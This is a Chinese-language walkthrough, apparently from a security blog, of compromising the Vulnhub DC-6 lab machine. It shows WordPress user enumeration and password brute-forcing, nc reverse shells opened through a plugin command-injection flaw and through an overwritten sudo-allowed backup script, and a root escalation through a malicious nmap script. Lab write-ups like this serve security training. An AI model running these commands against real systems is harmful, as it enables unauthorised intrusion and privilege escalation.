每周打靶 | Vulnhub-DC6靶机渗透实战

网络安全自修室

发布于 2023-09-02 17:19:45

3280

发布于 2023-09-02 17:19:45

文章被收录于专栏：网络安全自修室网络安全自修室

免责声明

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集，旨在提高网络安全技术水平为目的，只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试加入交流群讨论或留言私信，如有侵权请联系小编处理。

内容速览

0x00前言

这是网络安全自修室每周带星球小伙伴一起实战的第5台靶机，欢迎有兴趣的小伙伴一起加入实操，毕竟实践出真知！

靶机可从Vulnhub平台免费下载，并通过虚拟机在本地搭建，渗透实战是一个找寻靶机中的flag的过程，并以获得最终的flag为目标！

攻击机：Kali Linux

靶机环境：192.168.241.139

所用工具：nmap | wpscan | nc | BurpSuite

0x01 知识点

wpscan爆破
nmap提权

0x02 信息搜集

发现打开的端口是80 和 22

sudo masscan --min-rate=10000 192.168.241.139 -p-

对存在的端口进行详细的服务探测

sudo nmap -O -sC -sV 192.168.241.139 -p 80,22 -oN 139.xml

综上信息搜集可以发现，该目标系统为Linux，开放22和80端口，其中web服务是用的Wordpress框架，根据经验，重点从web上突破，考虑用字典爆破后台和ssh服务的账号密码

值得注意的是：发现开了80端口却无法访问，是重定向到wordy域名可在如下hosts文件中添加ip对应域名

win10路径：C:\Windows\System32\drivers\etc\hosts

linux路径：etc/hosts

0x03 获取权限

使用工具wpscan枚举用户,获取到5个用户，保存为users.txt

wpscan --url wordy -e u

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

既然有用户，就只需要找密码本进行爆破即可，这边看到官方有提示，可以提取k01的密码，可以节省爆破时间

根据提示生成密码本

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

开始暴力破解

wpscan --url http://wordy/ -U users.txt -P passwords.txt

获取到账号密码 mark helpdesk01

进入后台发现有个active管理插件命令执行漏洞

直接抓包使用nc反弹shell

nc 192.168.241.129 2222 -e /bin/bash

itkjz

获取交互shell

python -c "import pty;pty.spawn('/bin/bash')"

root@bbkali:/tmp/dc6# nc -lvp 2222
listening on [any] 2222 ...
connect to [192.168.241.129] from wordy [192.168.241.139] 36108
python -c "import pty;pty.spawn('/bin/bash')"

常规翻看目录，发现有价值提示to-do-sometings.txt


www-data@dc-6:/home$ ls -R

.:
graham  jens  mark  sarah

./graham:

./jens:
backups.sh

./mark:
stuff

./mark/stuff:
things-to-do.txt

./sarah:

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt 

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

发现graham密码`GSo7isUM1D4

提权

ssh登录graham发现backups.txt可利用提权

graham@dc-6:/home$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/home$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

直接将nc命令加入backups.sh

graham@dc-6:/home/jens$ cat backups.sh 
nc 192.168.241.129 2223 -e /bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

获取到jens权限,发现能以root用户免密码执行nmap

pwd
/home
whoami
jens
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

写个nmap脚本

echo 'os.execute("/bin/sh")' > root.nse

运行该脚本获取root权限并拿到flag

sudo nmap --script=/home/jens/root.nse

jens@dc-6:~$ sudo nmap --script=/home/jens/root.nse


Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-07 00:06 AEST
# pwd
/home/jens
# whoami
root
# cd /root
# s^H
/bin/sh: 4: : not found
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.